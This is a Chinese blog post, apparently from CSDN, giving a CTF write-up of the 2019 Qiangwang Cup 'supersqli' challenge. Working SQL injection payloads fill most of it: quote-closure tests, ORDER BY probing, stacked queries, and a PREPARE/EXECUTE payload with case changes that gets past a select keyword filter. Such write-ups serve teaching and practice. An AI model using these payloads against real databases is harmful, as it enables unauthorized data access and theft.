2019年强网杯“随便注”

最新推荐文章于 2024-10-05 14:16:38 发布
最新推荐文章于 2024-10-05 14:16:38 发布
阅读量111 收藏
点赞数 2
分类专栏: web 攻防世界 ctf 文章标签: 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChamZhiZe/article/details/120967541
版权
ctf 同时被 3 个专栏收录
11 篇文章 0 订阅
订阅专栏
web
6 篇文章 0 订阅
订阅专栏
攻防世界
5 篇文章 0 订阅
订阅专栏
本文介绍了SQL注入攻击的一种场景,通过测试闭合、联合查询等方法发现过滤机制。接着,利用堆叠注入和预编译命令(如SET、PREPARE、EXECUTE)来绕过过滤,尝试获取数据库信息。虽然某些命令被过滤,但通过大小写混淆和组合技术,最终成功获取了表结构。文章展示了在安全防护下进行SQL注入的复杂性和策略。
摘要由CSDN通过智能技术生成

地址:
攻防世界:web 进阶区supersqli
buuoj.cn也有

在这里插入图片描述
很显然是注入。
先测试闭合
1’--------------错误
1’ # -----------------正确
单引号闭合

获得 列数:
1’ order by 1 #
1’ order by 2 #
1’ order by 3 # ----------------- 错误

union联合查询。。
发现报错了。。

1’ union select 1,database() #

在这里插入图片描述
就说 过滤了 select、updata等字符串
我常用的方法 都给我 过滤掉了。。。

新姿势

利用堆叠注入绕过过滤

就是 一次执行多个命令。

1‘ ;show tables#

在这里插入图片描述

1' ;desc `1919810931114514` # 


desc 是一个MySQL命令:
查询表结构的详细信息


使用格式 :
desc 表名
desc columns from 表名 
获得表的结构

在这里插入图片描述
看到 flag, flag 存在于 1919810931114514表达的flag字段。

desc 命令用不了的,,

新姿势

预编译

预编译相关语法:

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句

1' ; set @sql = Concat('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#



拆开分析:
1’ ;
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXCUTE stmt;

在这里插入图片描述
检测到了 set 和 prepare 但是strstr 不能区分大小写

1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

拆开来分析:
1';
Set @sql = CONCAT('se','lect * from `1919810931114514`;');
Prepare stmt from @sql;
EXECUTE stmt;

网上还有另一种绕过select 的方法 是更改表明列名 。

tutou_hao
关注
专栏目录
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2688
以buuctf的强网杯2019为例的堆叠
[强网杯 2019]随便
m0_56691564的博客
11-30 2804
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
buuctf[强网杯 2019]随便 1(超详细,三种解法)
2401_84968222的博客
05-16 351
自我介绍一下,小编13上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF-[强网杯 2019]随便1
Monica的博客
09-06 659
目录 题目: 方法: 其他问题: 1、url中#是特殊字符,参数中有#号的时候需要进行url编码。 2、url中空格变成+和空格变成%20问题 题目: 方法: 只有输入1和2才有结果 发现输出是两列,一列是键,一列是值 测试是什么闭合 输入1'发现有个报错 我们复制near后面的代码,通过一个字符一个字符的删除,发现是: 单引号 单引号 1 单引号 单引号 单引号 所以这不是双引号闭合,而是一个单引号闭合。 测试输出有几列 pa...
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 413
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
[强网杯 2019]随便1
weixin_41571993的博客
09-25 496
靶场练习
buuctf web题解之[强网杯 2019]随便1详解(1)
m0_60666841的博客
04-07 433
讲解视频,并且后续会持续更新**
buuctf web题解之[强网杯 2019]随便1详解(1),看完没有不懂的
wdsfgj的博客
04-17 1072
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
buuctf web题解之[强网杯 2019]随便1详解,网络安全基础72问
2301_78416732的博客
04-03 769
堆叠入mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠入其实就是通过结束符来执行多条sql语句三、解题当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在入点但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。就如上边所说,闭合方式有很多种,我们需要挨个猜常见的闭合方式有成对的’ ‘、” “、( )、(’ ')判断具体是哪种,只能挨个试…直到输入 1’ 页面发生了报错,说明是 ’ 闭
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 618
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
实用SQL小总结
UntifA的博客
09-29 1470
SQL记录
PostgreSQL的WAL日志优化及验证
最新发布
Java_fenxiang的博客
10-05 444
在应用负载不变的情况下可以通过如下方法进行WAL优化登录后复制 1) 延长checkpoint时间间隔 FPI产生于checkpoint之后第一次变脏的page,在下次checkpoint到来之前,已经输出过FPI的page是不在需要再次输出FPI。因此checkpoint时间间隔越长,FPI产生的频度会越低。增大ch...
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1282
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 321
Wintergrasp 冬拥湖 120 VS 120
Redis事务
zhzjn的博客
09-30 395
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 898
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tutou_hao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值